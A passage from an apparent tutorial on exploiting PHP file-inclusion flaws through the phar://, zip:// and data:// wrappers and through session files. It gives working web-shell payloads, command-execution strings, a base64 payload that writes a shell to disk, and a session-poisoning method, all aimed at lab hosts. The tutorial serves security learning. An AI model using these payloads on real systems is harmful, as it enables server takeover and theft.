&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwex09o557fr0uhl5p76c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwex09o557fr0uhl5p76c.png" alt=" " width="799" height="259"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc7gj0n4dwt70nizbz5ip.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc7gj0n4dwt70nizbz5ip.png" alt=" " width="800" height="279"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  phar:// (Command Execution)
&lt;/h4&gt;

&lt;p&gt;Same as &lt;code&gt;phar://&lt;/code&gt;, but with file content changed to &lt;code&gt;&amp;lt;?php system('whoami');?&amp;gt;&lt;/code&gt;.&lt;/p&gt;
&lt;h4&gt;
  
  
  phar:// (Writing a Trojan)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;PHP version &amp;gt;= 5.3.0&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_include&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_fopen&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Create a web shell &lt;code&gt;shell.php&lt;/code&gt; with content &lt;code&gt;&amp;lt;?php @eval($_POST[v]);?&amp;gt;&lt;/code&gt; and pack into a ZIP archive:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsz3c5ebl8uenwde1r0xc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsz3c5ebl8uenwde1r0xc.png" alt=" " width="800" height="167"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Absolute path:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;http://192.168.1.4/fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;phar://D:/phpStudy/PHPTutorial/WWW/test.zip/shell.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Relative path (if &lt;code&gt;test.zip&lt;/code&gt; in current directory):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;http://192.168.1.4/fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;phar://test.zip/shell.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After visiting the URL, the web shell is written. Then use a shell management tool (e.g., AntSword) to connect.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo7m1eglduxiglksz3xy8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo7m1eglduxiglksz3xy8.png" alt=" " width="800" height="463"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The same extension bypass applies: the archive can be renamed.&lt;/p&gt;

&lt;h4&gt;
  
  
  zip://
&lt;/h4&gt;

&lt;p&gt;The &lt;code&gt;zip://&lt;/code&gt; pseudo-protocol is similar to &lt;code&gt;phar://&lt;/code&gt; but used differently.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;PHP version &amp;gt;= 5.3.0&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_include&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_fopen&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Construct a ZIP package similarly:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9795lc6diut492bvy781.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9795lc6diut492bvy781.png" alt=" " width="800" height="300"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;With &lt;code&gt;zip://&lt;/code&gt;, an absolute path is required. The separator between the archive and the inner file is &lt;code&gt;#&lt;/code&gt;, which must be URL-encoded as &lt;code&gt;%23&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight perl"&gt;&lt;code&gt;&lt;span class="nv"&gt;fileinclude&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;php&lt;/span&gt;&lt;span class="p"&gt;?&lt;/span&gt;&lt;span class="nv"&gt;file&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;zip:&lt;/span&gt;&lt;span class="sr"&gt;//&lt;/span&gt;&lt;span class="nv"&gt;D:&lt;/span&gt;&lt;span class="sr"&gt;/phpStudy/&lt;/span&gt;&lt;span class="nv"&gt;PHPTutorial&lt;/span&gt;&lt;span class="sr"&gt;/WWW/&lt;/span&gt;&lt;span class="nv"&gt;test&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;zip&lt;/span&gt;&lt;span class="o"&gt;%&lt;/span&gt;&lt;span class="mi"&gt;23&lt;/span&gt;&lt;span class="nv"&gt;phpinfo&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;php&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Relative paths cause inclusion failure.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The same extension bypass applies.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhn3bub17kv7zfdowt09f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhn3bub17kv7zfdowt09f.png" alt=" " width="799" height="241"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  zip:// (Command Execution)
&lt;/h4&gt;

&lt;p&gt;Same as &lt;code&gt;zip://&lt;/code&gt;, with file content changed to &lt;code&gt;&amp;lt;?php system('whoami');?&amp;gt;&lt;/code&gt;.&lt;/p&gt;

&lt;h4&gt;
  
  
  zip:// (Writing a Trojan)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;PHP version &amp;gt;= 5.3.0&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_include&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_fopen&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Create a web shell &lt;code&gt;shell.php&lt;/code&gt; with content &lt;code&gt;&amp;lt;?php @eval($_POST[v]);?&amp;gt;&lt;/code&gt; and pack into a ZIP archive:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsz3c5ebl8uenwde1r0xc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsz3c5ebl8uenwde1r0xc.png" alt=" " width="800" height="167"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Absolute path:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight perl"&gt;&lt;code&gt;&lt;span class="nv"&gt;http:&lt;/span&gt;&lt;span class="sr"&gt;//&lt;/span&gt;&lt;span class="mf"&gt;192.168.1.4&lt;/span&gt;&lt;span class="sr"&gt;/fileinclude.php?file=zip://D:/p&lt;/span&gt;&lt;span class="nv"&gt;hpStudy&lt;/span&gt;&lt;span class="sr"&gt;/PHPTutorial/&lt;/span&gt;&lt;span class="nv"&gt;WWW&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="nv"&gt;test&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;zip&lt;/span&gt;&lt;span class="o"&gt;%&lt;/span&gt;&lt;span class="mi"&gt;23&lt;/span&gt;&lt;span class="nv"&gt;shell&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;php&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After visiting the URL, the web shell is written. Relative paths cause failure.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnqkzjbzj1kdfrdqzbyez.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnqkzjbzj1kdfrdqzbyez.png" alt=" " width="800" height="272"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzxs31yjbjaivqa3aqal6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzxs31yjbjaivqa3aqal6.png" alt=" " width="800" height="540"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  data://
&lt;/h4&gt;

&lt;p&gt;A data stream wrapper that redirects the inclusion stream to user-controlled input. In simple terms, it includes the user's input stream.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;PHP version &amp;gt;= 5.2&lt;/li&gt;
&lt;li&gt;&lt;code&gt;allow_url_fopen = On&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;allow_url_include = On&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique 1:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;fileinclude.php?file=data:text/plain,&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nb"&gt;phpinfo&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdcsqtu9edc5awwyyj7br.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdcsqtu9edc5awwyyj7br.png" alt=" " width="800" height="338"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technique 2 (Base64):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;data:text/plain&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nb"&gt;base64&lt;/span&gt;,PD9waHAgcGhwaW5mbygpOz8%2b
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;PD9waHAgcGhwaW5mbygpOz8+&lt;/code&gt; decodes to &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt;. The &lt;code&gt;+&lt;/code&gt; must be URL-encoded as &lt;code&gt;%2b&lt;/code&gt;; otherwise an error occurs.&lt;/p&gt;

&lt;h4&gt;
  
  
  data:// (Command Execution)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Technique 1:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;fileinclude.php?file=data:text/plain,&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nb"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'whoami'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Technique 2 (Base64):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;data:text/plain&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nb"&gt;base64&lt;/span&gt;,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg&lt;span class="o"&gt;==&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Decodes to &lt;code&gt;&amp;lt;?php system('whoami');?&amp;gt;&lt;/code&gt;.&lt;/p&gt;

&lt;h4&gt;
  
  
  data:// (Writing a Trojan)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Technique 1:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;fileinclude.php?file=data:text/plain,&lt;span class="nt"&gt;&amp;lt;&lt;/span&gt;&lt;span class="err"&gt;?&lt;/span&gt;&lt;span class="na"&gt;php&lt;/span&gt; &lt;span class="na"&gt;fputs&lt;/span&gt;&lt;span class="err"&gt;(&lt;/span&gt;&lt;span class="na"&gt;fopen&lt;/span&gt;&lt;span class="err"&gt;('&lt;/span&gt;&lt;span class="na"&gt;hack.php&lt;/span&gt;&lt;span class="err"&gt;','&lt;/span&gt;&lt;span class="na"&gt;w&lt;/span&gt;&lt;span class="err"&gt;'),'&lt;/span&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="o"&gt;@&lt;/span&gt;&lt;span class="k"&gt;eval&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_POST&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;&lt;span class="err"&gt;');?&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F05ddl5cxl21nwzgdzoqx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F05ddl5cxl21nwzgdzoqx.png" alt=" " width="721" height="324"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technique 2 (Base64):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;data:text/plain&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nb"&gt;base64&lt;/span&gt;,PD9waHAgZnB1dHMoZm9wZW4oJ2hhY2sucGhwJywndycpLCc8P3BocCBAZXZhbCgkX1BPU1Rbdl0pPz4nKTs/Pg&lt;span class="o"&gt;==&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Decodes to &lt;code&gt;&amp;lt;?php fputs(fopen('hack.php','w'),'&amp;lt;?php @eval($_POST[v])?&amp;gt;');?&amp;gt;&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Including Session Files
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt; The session file path is known, and the content is partially controllable.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The PHP session file save path can be found in &lt;code&gt;phpinfo&lt;/code&gt; under &lt;code&gt;session.save_path&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frqy9i9257hxb8feqfsg5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frqy9i9257hxb8feqfsg5.png" alt=" " width="800" height="99"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Common PHP session storage locations:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;code&gt;/var/lib/php/sess_PHPSESSID&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/var/lib/php/sess_PHPSESSID&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/tmp/sess_PHPSESSID&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/tmp/sessions/sess_PHPSESSID&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Session file naming: &lt;code&gt;sess_[phpsessid]&lt;/code&gt;. PHPSESSID can be found in the cookie field of the request.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0d3kp3apqgzurs7d1iaj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0d3kp3apqgzurs7d1iaj.png" alt=" " width="800" height="153"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To include and exploit, the attacker must control some session file content. No general solution exists. Sometimes, include the session file first, observe its contents, then find controllable variables to inject payloads and execute PHP code.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Example 1:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Line 3&lt;/span&gt;
&lt;span class="nb"&gt;session_start&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_SESSION&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'username'&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nb"&gt;header&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'Location: index.php'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# Line 8&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_POST&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'username'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nv"&gt;$_POST&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'password'&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$username&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$_POST&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'username'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

    &lt;span class="c1"&gt;# Line 20&lt;/span&gt;
    &lt;span class="nv"&gt;$stmt&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;bind_result&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$res_password&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="c1"&gt;# Line 24&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$res_password&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="nv"&gt;$password&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nv"&gt;$_SESSION&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'username'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;base64_encode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$username&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="nb"&gt;header&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"location:index.php"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The variable &lt;code&gt;$username&lt;/code&gt; is controllable and written to &lt;code&gt;$_SESSION&lt;/code&gt;. If the data is unfiltered, it ends up in the session file. Combined with file inclusion, the session file may be included.&lt;/p&gt;

&lt;p&gt;To include the session file, the path must be known. Register a user (e.g., Johnson). After successful login, note the PHPSESSID cookie value (e.g., &lt;code&gt;0d0385dc6a1067f4e3406191&lt;/code&gt;). Even a failed login creates a session file.&lt;/p&gt;

&lt;p&gt;Visit:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;http://x.x.x.x/index.php?action&lt;span class="o"&gt;=&lt;/span&gt;/var/lib/php5/sess_0d0385dc6a1067f4e3406191
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;However, the username is base64-encoded. Using a pseudo-protocol to decode the entire session file may cause garbled characters due to the serialised prefix. Consider base64 encoding. The session prefix &lt;code&gt;username|s:12:"&lt;/code&gt; (the number &lt;code&gt;12&lt;/code&gt; is the length of the base64 string). For lengths &amp;lt;100, the prefix is 15 characters; for 100–999, it is 16 characters.&lt;/p&gt;

&lt;p&gt;16 characters satisfy: 16 * 6 = 96 bits, 96 mod 8 = 0. Thus, when base64-decoding the session file, the first 16 characters become garbled but do not affect the remaining part (the base64-encoded username). Register a username like &lt;code&gt;JohnsonJohnson...&lt;/code&gt; (long enough that its base64 length exceeds 100) plus &lt;code&gt;&amp;lt;?php eval($_GET['abcdefg']) ?&amp;gt;&lt;/code&gt;. Then visit:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="o"&gt;://&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;index&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="n"&gt;php&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="n"&gt;action&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;php&lt;/span&gt;&lt;span class="o"&gt;://&lt;/span&gt;&lt;span class="n"&gt;filter&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;read&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;convert&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;decode&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;resource&lt;/span&gt;&lt;span class="o"&gt;=/&lt;/span&gt;&lt;span class="k"&gt;var&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;lib&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;php5&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;sess_0d0385dc6a1067f4e3406191&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span 